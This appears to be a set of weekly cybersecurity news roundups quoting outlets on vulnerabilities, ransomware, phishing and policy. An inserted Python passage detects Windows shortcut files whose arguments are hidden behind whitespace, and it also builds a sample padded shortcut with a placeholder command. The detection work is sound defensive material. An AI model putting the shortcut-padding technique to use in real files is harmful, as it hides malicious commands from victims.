    • “The National Institute of Standards and Technology (NIST) is still struggling to clear the growing backlog of CVEs in the official national vulnerability database and the problem will only get worse this year.
    • “That’s the gist of a fresh NIST update with an admission that the current pace of processing vulnerabilities is simply not enough to keep up with the surge in submissions.
    • “According to the update, while the National Vulnerability Database (NVD) is processing incoming CVEs at the same rate as before the slowdown in spring and early summer 2024, a 32 percent jump in submissions last year means that the backlog continues to grow.
    • “We anticipate that the rate of submissions will continue to increase in 2025,” the institute said, noting that it is exploring the use of AI and machine learning to automate certain processing tasks.”
  • The Cybersecurity and Infrastructure Security Agency added five known exploited vulnerabilities to its catalog this week.
  • March 24, 2025
    • CVE-2025-30154 reviewdog action-setup GitHub Action Embedded Malicious Code Vulnerability
  • March 26, 2025
    • CVE-2019-9874 Sitecore CMS and Experience Platform (XP) Deserialization Vulnerability
    • CVE-2019-9875 Sitecore CMS and Experience Platform (XP) Deserialization Vulnerability
      • Security Affairs discusses the March 24 and 26 KEVs here.
  • March 27, 2025
    • CVE-2025-2783 Google Chromium Mojo Sandbox Escape Vulnerability
      • Bleeping Computer discusses a fix to this KEV here.
  • Cybersecurity Dive reports yesterday,
    • “Information security firms are taking measures to protect customers and their own networks as they wait for official guidance following claims of a massive attack against Oracle Cloud. 
    • “A threat actor last week claimed to have stolen 6 million data records, including user credentials, from Oracle Cloud, which could affect more than 140,000 customers. After initially releasing strong denials, Oracle has been silent this week, while security researchers have compiled evidence backing claims of an actual attack.” * * *
    • “Orca Security said it was initially skeptical of the reported breach and has not seen any confirmation that the hacker obtained user credentials. However, the firm did not consider Oracle’s initial denials to be fully transparent.
    • “We still believe that the risk outweighs our skepticism and that organizations should take immediate action to rotate credentials and otherwise protect their Oracle Cloud tenants as appropriate,” Neil Carpenter, field CTO at Orca Security, said via email.” 
  • and
    • “Researchers warn that three older vulnerabilities in DrayTek routers have been actively exploited in recent weeks, which coincides with widespread reports of devices automatically rebooting in recent days, according to GreyNoise Intelligence.  
    • “Researchers said exploitation activity has been observed against three vulnerabilities, tracked as CVE-2020-8515, CVE-2021-20123 and CVE-2021-20124.
    • “GreyNoise researchers said they cannot directly link the exploitation to the reboots. However, in a post on X Wednesday morning, DrayTek said the reboots appear to be linked to vulnerabilities disclosed in early March.”
  • and
    • “A prolific Russian threat actor is exploiting a zero-day flaw in the Microsoft Management Console (MMC) framework to execute malicious code on targeted systems in an ongoing cyberattack campaign that puts unpatched systems at risk.
    • “The attacks, by a group that Trend Micro tracks as Water Gamayun, use the CVE-2025-26633 vulnerability, also known as MSC Evil Twin, to manipulate .msc files and the MMC console’s Multilingual User Interface Path (MUIPath). From there the attacker, better known as EncryptHub, downloads and executes malicious payloads, maintains persistence and steals sensitive data from infected systems.
    • “Microsoft patched MSC Evil Twin as part of its March Patch Tuesday raft of fixes on March 11. The flaw was still a zero-day when EncryptHub exploited it by executing malicious .msc files through a legitimate one, according to Trend Micro. The flaw allows an attacker to bypass a security feature in the MMC after convincing a victim to click on a malicious link or open a malicious file. The weakness stems from the console’s failure to properly sanitize user input.”
  • Dark Reading reports,
    • “The rate of severe cloud security incidents affecting customers of Palo Alto Networks rose more than threefold over the course of 2024.
    • “By comparing the beginning and end of 2024, Palo Alto tracked a 388% increase in cloud security alerts affecting organizations. The overwhelming majority of that rise can be attributed to neither threats of a low severity (up 10% through the year) nor even medium-severity (up 21%), but high-severity incidents, which rose by a full 235%.
    • “The implication here is that malicious actors are not only attacking the cloud more often but also doing it more effectively.”
  • and
    • “Bypassing multifactor authentication isn’t hard, if you’re willing to get a little evil.
    • “Sophos researchers this week detailed how Evilginx, a malicious version of the widely used open source NGINX Web server, can be used in adversary-in-the-middle (AitM) attacks to steal credentials and authentication tokens. Perhaps more importantly, the hacking tool can beat MFA protection.
    • “Evilginx has been around for many years as an AitM framework for capturing user credentials, but security researchers have recently deployed the tool for more complex attacks. For example, Accenture security researcher Yehuda Smirnov last year developed a technique to beat Microsoft’s Windows Hello for Business by downgrading the authentication via an Evilginx attack.
    • “Smirnov demonstrated the technique at Black Hat USA 2024, and Microsoft issued a fix to prevent the attack. However, Sophos researchers say Evilginx can still be used to sweep up credentials and bypass MFA.”
  • Per Bleeping Computer,
    • “A newly discovered phishing-as-a-service (PhaaS) operation that researchers call Morphing Meerkat, has been using the DNS over HTTPS (DoH) protocol to evade detection.
    • “The platform also leverages DNS email exchange (MX) records to identify victims’ email providers and to dynamically serve spoofed login pages for more than 114 brands.
    • “Morphing Meerkat has been active since at least 2020 and it was discovered by security researchers at Infoblox. Although the activity has been partially documented, it went mostly under the radar for years.”

From the ransomware front,

  • Cybersecurity Dive reports,
    • “Ransomware actors are increasingly abusing vulnerable drivers to craft tools known as “EDR killers,” which can disrupt and even delete extended detection and response products in enterprise networks, according to an ESET report published Wednesday.
    • “Threat actors abuse vulnerable drivers because they have kernel access to operating systems, which enables attackers to kill processes for security products like EDR before they can detect malicious activity.
    • “ESET researchers analyzed a custom tool called “EDRKillShifter,” which was developed and maintained by the notorious RansomHub ransomware gang and is now available on the dark web. The researchers observed an increase in the use of EDRKillShifter among other ransomware-as-a-service gangs such as Play, Medusa and BianLian.”
  • Beckers Health IT warns,
    • “The FBI and other federal authorities are warning healthcare organizations to safeguard against a ransomware group targeting the industry.
    • “The Medusa ransomware-as-a-service variant has been used to hack more than 300 victims from a variety of industries, including healthcare, most commonly through phishing campaigns and unpatched software vulnerabilities, according to a March cybersecurity advisory from the FBI, Cybersecurity and Infrastructure Security Agency, and Multi-State Information Sharing and Analysis Center.
    • “Medusa threat actors employ a “double extortion” model, where they both encrypt victims’ data and threaten to publicly release stolen information if their demands aren’t met, per the notice. They typically send ransom notes within 48 hours of an attack, offering to extend the deadline to pay by $10,000 a day.
    • “Healthcare organizations can protect against the threat by taking such steps as implementing a recovery plan, requiring multifactor authentication, and ensuring all operating systems, firmware and software are up to date, the agencies said.”
  • Per SiliconANGLE,
    • “A new report out today from cybersecurity company SquareX Inc. is warning of a dangerous new evolution in ransomware: browser-native attacks that bypass traditional defenses and put millions of users at risk.
    • “Browser-based ransomware differs from traditional ransomware that relies on downloaded files to infect systems in that the ransomware operates entirely within the browser and requires no download. Instead, the attack targets the victim’s digital identity, taking advantage of the shift toward cloud-based enterprise storage and the fact that browser-based authentication has become the primary gateway to accessing these resources.
    • “In a case study published by SquareX last week, the attacks leverage AI agents to automate the majority of the attack sequence, requiring minimal social engineering and interference from the attacker.”
  • The Hacker News tells us,
    • “In what’s an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. 
    • “Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract configuration files, credentials, as well as the history of commands executed on the server.
    • “The flaw concerns a “certain misconfiguration in the Data Leak Site (DLS) of BlackLock Ransomware, leading to clearnet IP addresses disclosure related to their network infrastructure behind TOR hidden services (hosting them) and additional service information,” the company said.”
  • Security Week lets us know,
    • “Ransomware Shifts Tactics as Payouts Drop: Critical Infrastructure in the Crosshairs
      Threats themselves change very little, but the tactics used are continually revised to maximize the criminals’ return on investment and effort.”

From the cybersecurity defenses front,

  • Cyberscoop reminds us,
    • “Despite glitches and possible funding potholes along the road, experts have nothing but praise and optimism for the CVE program’s future. “It’s not perfect by any means, but it has stood the test of time,” Art Manion, a longtime CVE expert and deputy director of ANALYGENCE Labs, speaking in his personal capacity, told CyberScoop. “A world without CVE in it would get pretty ugly.”
    • “MITRE’S Summers says, “It’s been 25 years of this program, and I don’t know if it’s possible to name another such public-private partnership program that has lasted that long and has continued to be so impactful in an ongoing way. I’m excited about the opportunity to continue evolving in ways that bring value to the community.”
    • “Empirical Security’s Roytman echoes the enthusiasm of his peers when he says, “The fact that we’ve gotten together as an industry and have this public good, and vendors build whole products off of it is wonderful and excellent and should continue to improve.”
  • Dark Reading offers “5 Considerations for a Data Loss Prevention Rollout; Strong DLP can be a game-changer — but it can also become a slow-moving, overcomplicated mess if not executed properly,” while SC Media provides “5 steps to protect against macOS security gaps.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • NextGov/FCW lets us know,
    • “A cornerstone federal program that certifies the security architecture of private sector cloud services for government use is expected to announce a fundamental overhaul to its processes on Monday [March 24], according to multiple people familiar with the matter.
    • “The moves, in the long term, are expected to automate many of the certification process steps for the Federal Risk and Authorization Management Program, or FedRAMP, which is used to ensure cloud providers meet strict cybersecurity requirements before government agencies can use their services, according to the people, who were granted anonymity to be candid about the forthcoming changes.
    • “FedRAMP has been a mainstay in government procurement for the last decade but has faced repeated complaints about the slow pace of cloud service approvals. FedRAMP has different approval levels that vary based on the sensitivity of the data a cloud service can handle, with higher levels requiring stricter security controls and generally longer review processes.”
  • and
    • “Despite goals set last year by the National Institute of Standards and Technology to process a backlog of unanalyzed cybersecurity vulnerabilities, the agency said it’s not expecting a slowdown anytime soon.
    • “The National Vulnerability Database — NIST’s cornerstone repository for researchers who use its contents and measuring tools to assess the dangers of cyber exploits — has been backed up with unanalyzed vulnerabilities since February last year. The scientific standards agency was projected to clear the logjam this month based on rates observed this past summer, Nextgov/FCW previously reported.
    • “But NIST said Wednesday that vulnerability submissions increased 32% in 2024 and prior processing rates from spring and early summer last year are no longer sufficient to keep up with incoming submissions. The backlog is still growing as a result.
    • “We anticipate that the rate of submissions will continue to increase in 2025. The fact that vulnerabilities are increasing means that the NVD is more important than ever in protecting our nation’s infrastructure. However, it also points to increasing challenges ahead,” an agency spokesperson said. “To address these challenges, we are working to increase efficiency by improving our internal processes, and we are exploring the use of machine learning to automate certain processing tasks.”
  • Per a March 21, 2025, HHS news release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Health Fitness Corporation (Health Fitness), located in Illinois, that provides wellness plans to clients across the country, resolving a potential violation under the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule.” * * *
    • “The settlement resolves OCR’s investigation of Health Fitness, which OCR initiated after receiving four reports from Health Fitness, over a three-month period (October 15, 2018, to January 25, 2019), of breaches of unsecured protected health information.  Health Fitness filed the breach reports on behalf of multiple covered entities as their business associate.  Health Fitness reported that beginning approximately in August 2015, ePHI became discoverable on the internet and was exposed to automated search devices (web crawlers) resulting from a software misconfiguration on the server housing the ePHI. Health Fitness discovered the breach on June 27, 2018.  Health Fitness initially reported that approximately 4,304 individuals were affected and later estimated that the number of individuals affected may be lower.  OCR’s investigation determined that Health Fitness had failed to conduct an accurate and thorough risk analysis, until January 19, 2024, to determine the potential risks and vulnerabilities to the ePHI held by Health Fitness.
    • “Under the terms of the resolution agreement, Health Fitness agreed to implement a corrective action plan that OCR will monitor for two years and paid $227,816 to OCR.” * * *
    • The resolution agreement and corrective action plan may be found at:  https://www.hhs.gov/sites/default/files/health-fitness-ra-cap.pdf [PDF, 202 KB].

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop tells us,
    • “Cybercriminals used information-stealing malware to a devastating effect last year, capturing sensitive data that fueled ransomware, breaches and attacks targeting supply chains and critical infrastructure, according to a new report.
    • “Infostealers were used to steal 2.1 billion credentials last year, accounting for nearly two-thirds of 3.2 billion credentials stolen from all organizations, Flashpoint said in a report released Tuesday. By targeting identity and access, cybercriminals stole 33% more credentials in 2024 compared to the previous year. More than 200 million credentials were already stolen in the first two months of this year.
    • “Infostealers are proving to be incredibly versatile, contributing to account takeover, increasing data breach totals, acting as initial access vectors to ransomware, as well as assisting in exploitation via vulnerabilities,” Ian Gray, vice president of intelligence at Flashpoint, said in an email.”
  • Security Week informs us,
    • “Browser security cannot be ignored. It’s where people spend most of their working day, and it’s where attackers focus most of their attacks.
    • “Statistics come from Menlo Security’s analysis of 750,000 browser-based phishing attacks targeting more than 800 entities detected over the last 12 months. This analysis reveals a 140% increase in browser phishing, including a 130% increase in zero-hour phishing attacks (effectively, a zero-day attack applied to phishing).
    • “The reasons for the growth are multiple: our growing reliance on the browser for much of our daily work, the prevalence of zero-day vulnerabilities, the increasing sophistication of the cybercriminal underworld, and, worryingly, the growing influence of gen-AI. Gen-AI is particularly concerning, both for its use today and its potential use in the future.
    • “Threat actors have advanced in speed and skills. They are using the same tools and infrastructure as professional engineers,” comments Andrew Harding, VP of security strategy at Menlo Security. “We’re seeing a dangerous combination of zero-day attacks, advanced social engineering techniques, sophisticated phishing techniques, and readily available phishing-as-a-service kits, all designed to infiltrate systems and steal valuable data.”
    • “He adds, “This trend is only poised to escalate dramatically in 2025 as attackers adopt AI to increase both scale and effectiveness.”
  • Dark Reading adds,
    • “A nearly decade-long malware campaign known as “DollyWay World Domination” has compromised more than 20,000 WordPress websites over the past eight years.
    • “GoDaddy published a report this week claiming multiple threat campaigns tracked by various security researchers since 2016 are actually one larger operation perpetrated by VexTrio, a massive cybercrime network that leverages traffic distribution systems (TDSs) and lookalike domains to deliver malware and scams.
    • “GoDaddy’s Denis Sinegubko wrote in the company’s research blog that the operation is tracked as DollyWay World Domination due to a string of code found in variations of the DollyWay malware: `define('DOLLY_WAY', 'World Domination');`.
  • and
    • “Mobile phone jailbreaks are thriving, exposing users to anywhere between three- and 3,000-times greater risk of cyber compromise.
    • “Organizations already face a significant risk in bring your own device (BYOD) attacks. More than 70% of infected devices are personal, and a good chunk of organizations have watched as malware entered their walls through unmanaged devices belonging to employees.
    • “The risk is supercharged, though, when those devices are cracked. New data from Zimperium shows that rooted and jailbroken Android phones and iPhones are 3.5 times more likely to be infected with malware and 250 times more likely to be totally compromised.
    • “What we’ve seen is that the amount of jailbreaks and roots has decreased slightly in recent years,” says Kern Smith, vice president of global solutions engineering at Zimperium. However, he warns, “The risk of those has increased significantly. These jailbreaks and roots expose these devices to a much, much higher risk profile. And mobile devices in general are being exposed to a much higher risk profile today. So it becomes a multiplier effect.”
  • Per Fedscoop,
    • “The Federal Bureau of Investigation has warned federal employees that cybercriminals are attempting to steal their login credentials in connection to a widely used government financial services platform, according to a notice viewed by FedScoop. 
    • “Hackers are targeting the Employee Personal Page, or MyEPP page, which is operated by the National Finance Center (NFC), a financial and human resources shared service within the Agriculture Department used by 661,000 employees across the federal government for payroll. The site, which is used to manage salary and benefits information, is typically accessed through an online account or with Login.gov credentials. 
    • “According to the FBI, cybercriminals hope to trick federal employees by running advertisements on search engines that impersonate the NFC website. If they click on the ad, employees are brought to a “sophisticated phishing website” that looks similar to the actual MyEPP page that aims to capture their login credentials when users enter them.”
  • Per Bleeping Computer,
    • “Veeam has patched a critical remote code execution vulnerability tracked as CVE-2025-23120 in its Backup & Replication software that impacts domain-joined installations.
    • “The flaw was disclosed yesterday and affects Veeam Backup & Replication version 12.3.0.310 and all earlier version 12 builds. The company fixed it in version 12.3.1 (build 12.3.1.1139), which was released yesterday.
    • “According to a technical writeup by watchTowr Labs, who discovered the bug, CVE-2025-23120 is a deserialization vulnerability in the Veeam.Backup.EsxManager.xmlFrameworkDs and Veeam.Backup.Core.BackupSummary .NET classes.”
  • Cybersecurity Dive tells us,
    • At least 11 state-sponsored threat groups since 2017 have been actively exploiting a Microsoft zero-day flaw allowing for abuse of Windows shortcut files to steal data and commit cyber espionage against organizations in various industries.
    • Researchers from Trend Micro’s Trend Zero Day Initiative (ZDI) have identified nearly 1,000 malicious .lnk files abusing the flaw, tracked as ZDI-CAN-25373, which allows attackers to execute hidden malicious commands on a victim’s machine by leveraging crafted shortcut files.
    • “By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” according to a Trend Micro blog post on Tuesday. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”
    • “The malicious files delivered by attackers include various payloads, including the Lumma infostealer and Remcos remote access Trojan (RAT), that expose organizations to risks of data theft and cyber espionage.”
  • CISA added five known exploited vulnerabilities to its catalog this week.
    • March 18, 2025
      • CVE-2025-24472 Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
      • CVE-2025-30066 tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability
        • Dark Reading discusses the Fortinet KVE here, and Cybersecurity Dive discusses the GitHub KVE here.
    • March 19, 2025
      • CVE-2025-1316 Edimax IC-7100 IP Camera OS Command Injection Vulnerability
      • CVE-2024-48248 NAKIVO Backup and Replication Absolute Path Traversal Vulnerability
      • CVE-2017-12637 SAP NetWeaver Directory Traversal Vulnerability
        • Hacker News discusses the Edimax KVE here and the NAKIVO KVE here. Cybersecurity News discusses the SAP KVE here.
  • Cybersecurity Dive adds,
    • Johannes Ullrich of the SANS Internet Storm Center reported exploitation attempts this week against two critical Cisco vulnerabilities that were initially disclosed in September. CVE-2024-20439 is a static credential vulnerability in the Cisco Smart Licensing Utility, and CVE-2024-20440 is an information disclosure flaw in the utility. 
    • It’s unclear if the exploitation was successful, but Ullrich noted the static credential for CVE-2024-20439 was previously published by a security researcher and could be used to remotely access affected devices.
    • Ullrich told Cybersecurity Dive the exploitation attempts likely originate from a smaller botnet, with activity spiking over the last week.
  • Fierce Healthcare lets us know,
    • “A new report by Clearwater Security found that incident response and resilience was a major issue for private equity-owned healthcare companies, which need to improve consistency in cybersecurity governance in light of their high-growth business model.
    • “The assessment found systemic gaps in security preparedness, as healthcare organizations need more documented policies for cybersecurity practices from provider practices to digital health companies. Private equity firms need to consider the cybersecurity risk profiles of companies when deciding whether to acquire them or merge them with other businesses, Clearwater writes.
    • “Because private equity firms prioritize rapid growth of their portfolio companies, Clearwater found that health IT infrastructures and cybersecurity practices often fall behind. A cybersecurity incident can devalue a company overnight or rack up regulatory fines, a dangerous prospect for PE firms.
    • “The report looked at consumer health companies, healthcare data and analytics companies and physician practices owned by private equity firms. It also evaluated pharma, biosciences and dental services companies.”
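The hidden-arguments shortcut flaw (ZDI-CAN-25373) in the Cybersecurity Dive item above, as an added example that is not the article's or Trend Micro's code: a Python parser for Windows .lnk files that extracts the COMMAND_LINE_ARGUMENTS string and flags shortcuts whose arguments sit behind large runs of whitespace or are unusually long. The whitespace-padding heuristic, the thresholds, and the two constructed sample shortcuts are assumptions of this example, not details from the article.

```python
"""Parse Windows shortcut (.lnk) files and flag suspiciously padded arguments.

Added example; layout follows the MS-SHLLINK format. The idea that hidden
arguments are padded with whitespace is an assumption of this example.
"""
import os
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits that decide which optional structures follow the header
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR = 0x04, 0x08, 0x10
HAS_ARGS, HAS_ICON, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]
WS = " \t\n\v\f\r"  # whitespace a padded shortcut might use (assumption)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link as a dict."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:        # LinkTargetIDList: IDListSize + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:  # StringData: fixed order, present only if flagged
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def analyze_lnk(data: bytes, max_padding: int = 64, max_len: int = 512) -> dict:
    """Report padding around the arguments; the thresholds are assumptions."""
    args = parse_lnk(data).get("arguments", "")
    leading = len(args) - len(args.lstrip(WS))
    trailing = len(args) - len(args.rstrip(WS))
    return {
        "arguments": args.strip(WS),
        "leading_padding": leading,
        "trailing_padding": trailing,
        "length": len(args),
        "suspicious": leading > max_padding or trailing > max_padding or len(args) > max_len,
    }


def scan_directory(root: str) -> list:
    """Walk a tree and return (path, report) for every suspicious .lnk file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".lnk"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    report = analyze_lnk(fh.read())
            except (OSError, ValueError):
                continue
            if report["suspicious"]:
                hits.append((path, report))
    return hits


def build_lnk(arguments: str, name: str = "") -> bytes:
    """Construct a minimal Unicode shell link (used only for the samples below)."""
    flags = HAS_ARGS | IS_UNICODE | (HAS_NAME if name else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand = 1
    def sd(s):  # StringData: CountCharacters + UTF-16LE characters, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + (sd(name) if name else b"") + sd(arguments)


# Constructed samples: one ordinary shortcut, one whose real arguments are
# pushed behind 800 whitespace characters so a properties view shows nothing.
BENIGN = build_lnk("/c echo hello", name="Notes")
PADDED = build_lnk(" \t" * 400 + "/c PLACEHOLDER-COMMAND")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("padded", PADDED)):
        print(label, analyze_lnk(blob))
```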

From the ransomware front,

  • Cybersecurity Dive reports,
    • “A Medusa ransomware campaign is using a malicious driver to disrupt and even delete endpoint detection and response (EDR) products on targeted organization networks.
    • “According to new research from Elastic Security Labs, the malicious driver, dubbed ABYSSWORKER, is deployed along with a packer-as-a-service called HeartCrypt to deliver Medusa ransomware. Elastic noted the driver was first documented in a ConnectWise post in January involving a different campaign of IT support scams using Microsoft Teams.
    • “In the Medusa ransomware attacks, Elastic discovered the malicious driver imitates a legitimate CrowdStrike Falcon driver and is using digital certificates from other companies to masquerade as a legitimate program. 
    • “All samples are signed using likely stolen, revoked certificates from Chinese companies,” Cyril François, senior research engineer at Elastic Security Labs, wrote in the blog post. “These certificates are widely known and shared across different malware samples and campaigns but are not specific to this driver.”
  • Per Bleeping Computer,
    • “Two malicious VSCode Marketplace extensions were found deploying in-development ransomware, exposing critical gaps in Microsoft’s review process.
    • “The extensions, named “ahban.shiba” and “ahban.cychelloworld,” were downloaded seven and eight times, respectively, before they were eventually removed from the store.
    • “It is notable that the extensions were uploaded onto the VSCode Marketplace on October 27, 2024 (ahban.cychelloworld) and February 17, 2025 (ahban.shiba), bypassing safety review processes and remaining on Microsoft’s store for an extensive period of time.”
  • Per Trend Research,
    • “Trend Research uncovered new versions of the Albabat ransomware. The development of these versions signifies the ransomware operators’ potential expansion of their targets from Windows to Linux and macOS. Research also reveals the group’s use of GitHub to streamline operations.
    • “Enterprises should remain vigilant against ransomware threats like Albabat as a successful attack can incur reputational damage, operational disruption, and financial losses once threat actors get a hold of and ransom critical data.
    • “To mitigate Albabat ransomware, organizations should have strong access controls for sensitive data, update and patch systems regularly and have proper backups.”
  • Per TechSpot,
    • “Akira, one of the most dangerous ransomware strains floating around the internet, just met its match — an Indonesian programmer armed with cloud computing and sheer determination.
    • As first reported by TechSpot, Yohanes Nugroho successfully cracked Akira, a multiplatform ransomware that has been wreaking havoc since 2023. Used by cyber criminals to target hundreds of businesses, government agencies, and industries, Akira has helped its developers earn millions.
    • “While this isn’t the first time someone has found a way to break Akira’s encryption, what makes this case remarkable is that Nugroho did it alone — and in just over 10 hours.”

From the cybersecurity business and defense front,

  • NextGov/FCW reports,
    • “Google has moved to expand the security aspects of its cloud offering by agreeing to acquire Wiz in a $32 billion all-cash transaction, the global tech giant’s largest-ever.
    • “Wiz generates roughly $1 billion in annual revenue with FedRAMP-authorized cloud security products in areas such as prevention, active detection and response.
    • “Google sees the addition of Wiz as helping it support more agencies as they look to move their systems into multi-cloud and hybrid cloud environments.
    • “At the same time, software and (artificial intelligence) platforms are becoming deeply embedded across products and operations, bringing new and evolving risks for private enterprises, governments, and other public sector organizations,” Google Cloud CEO Thomas Kurian said in a release.”
  • Dark Reading explains why “Cyber Quality Is the Key to Security. The time to secure foundations, empower teams, and make cyber resilience the standard is now — because the cost of waiting is far greater than the investment in proactive security.”
  • TechTarget offers “13 API security best practices to protect your business. APIs are the backbone of most modern applications, and companies must build in API security from the start. Follow these guidelines to design, deploy and protect your APIs.”
  • Here are links to
    • Dark Reading’s CISO Corner
    • A HelpNetSecurity video about “Pay, fight, or stall? The dilemma of ransomware negotiations”
    • A Cyberscoop podcast in which its editor in chief “Greg Otto talks with FTI Consulting’s Allie Bohan exploring the challenges organizations face in maintaining effective communication during cyberattacks.”
    • The FEHBlog watched the seven-minute-long video and listened to the podcast while drafting this post and he found them worthwhile.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Federal News Network lets us know,
    • “A former Energy Department and National Security Council official has been tapped to lead the Cybersecurity and Infrastructure Security Agency [CISA].
    • “President Donald Trump today [March 11, 2025,] formally nominated Sean Plankey to serve as director of CISA. Plankey’s name was included among a slew of nominations sent to the Senate.
    • “During Trump’s first term, Plankey served as principal deputy assistant secretary for Energy’s Office of Cybersecurity, Energy Security and Emergency Response, known as “CESER,” which leads cyber preparedness in the energy sector. He also served on Trump’s National Security Council as director for maritime and Pacific cybersecurity policy.”
  • Per a March 12, 2025, CISA news release,
    • CISA’s Red Team is among the best in the world and remains laser focused on helping our federal and critical infrastructure partners identify and mitigate their most significant vulnerabilities and weaknesses. This has not changed.
    • Contrary to inaccurate reporting, CISA has not “laid off” our Red Team. CISA has taken action to terminate contracts where the agency has been able to find efficiencies and eliminate duplication of effort. As good stewards of the taxpayer dollar and in accordance with good fiscal governance practices, CISA regularly reviews contracts across the agency to ensure that we have the capabilities that we need and that we are allocating resources in ways that make the most impact. This was a contract action that did not impact the employment status of CISA personnel.  
    • CISA’s Red Teams continue their work without interruption. The team works directly with network defenders, system administrators, and other technical staff to address strengths and weaknesses across critical infrastructure networks and systems. They continue to assist organizations in refining their detection, response, and hunt capabilities to protect the nation’s critical infrastructure from a range of threats.
  • Dark Reading offers context for this release.
  • The National Institute of Standards and Technology announced on March 12, 2025,
    • “The comment period for [draft] NIST Special Publication 1308, NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide is open through April 25, 2025, at 11:59 PM.”
  • Fedscoop tells us,
    • “Ethan Klein, an emerging technology policy adviser during the first Trump administration, has been nominated to be the White House’s chief technology officer, the Office of Science and Technology Policy confirmed Tuesday. 
    • “After serving in the first Trump White House, Klein completed a PhD in nuclear science and engineering at MIT, where he worked to develop nuclear tech for arms control and nonproliferation with funds from a fellowship through the National Nuclear Security Administration.” 
  • and
    • An Office of Personnel Management watchdog investigation into cybersecurity risks on government networks and the potential exposure of sensitive information will include an examination of DOGE access to those systems.
    • OPM’s Office of Inspector General said in a letter to Democrats on the House Oversight Committee that it would incorporate “parts” of the lawmakers’ February request to probe DOGE’s unauthorized accessing of IT networks and Americans’ data into “existing work.” The watchdog also said it had “initiated a new engagement on specific emerging risks at OPM that are related to issues raised” in Democrats’ letter.
  • Dark Reading relates,
    • “A dual Russian-Israeli citizen working as one of LockBit ransomware group’s lead developers has been extradited from Israel to the US. Rostislav Panev, 51, was arrested in 2023 and had his first US court appearance on March 14.
    • “According to the complaint against him, Panev was a developer for LockBit ransomware group from 2019 to at least February 2024. The ransomware group attacked more than 2,500 victims in 120 countries, 1,800 of them in the US. Victims ranged from individuals to small businesses and even multinational corporations that included nonprofit organizations, educational institutions, hospitals, and critical infrastructure. In targeting them, LockBit was able to garner at least $500 million in ransom payments and cause billions of dollars in losses.”

From the cybersecurity vulnerabilities and breaches front,

  • Security Week reports on March 10, 2025,
    • “More than 560,000 people were impacted across four data breaches disclosed last week to authorities by the healthcare organizations Hillcrest Convalescent Center, Gastroenterology Associates of Central Florida, Community Care Alliance, and Sunflower Medical Group.”
  • CISA added thirteen known exploited vulnerabilities to its catalog this week:
    • March 10, 2025
      • CVE-2025-25181 Advantive VeraCore SQL Injection Vulnerability
      • CVE-2024-57968 Advantive VeraCore Unrestricted File Upload Vulnerability
      • CVE-2024-13159 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability
      • CVE-2024-13160 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability
      • CVE-2024-13161 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability
        • NIST discusses the Advantive CVEs here and here
        • Cybersecurity Dive discusses the Ivanti CVEs here.
    • March 11, 2025
      • CVE-2025-24983 Microsoft Windows Win32k Use-After-Free Vulnerability
      • CVE-2025-24984 Microsoft Windows NTFS Information Disclosure Vulnerability
      • CVE-2025-24985 Microsoft Windows Fast FAT File System Driver Integer Overflow Vulnerability
      • CVE-2025-24991 Microsoft Windows NTFS Out-Of-Bounds Read Vulnerability
      • CVE-2025-24993 Microsoft Windows NTFS Heap-Based Buffer Overflow Vulnerability
      • CVE-2025-26633 Microsoft Windows Management Console (MMC) Improper Neutralization Vulnerability
        • Cyberscoop discusses these CVEs here.
    • March 13, 2025
      • CVE-2025-24201 Apple Multiple Products WebKit Out-of-Bounds Write Vulnerability
      • CVE-2025-21590 Juniper Junos OS Improper Isolation or Compartmentalization Vulnerability
        • Cyberscoop discusses the Apple CVE here.
        • Cybersecurity Dive discusses the Juniper CVE here.

From the ransomware front,

  • Cybersecurity Dive reports,
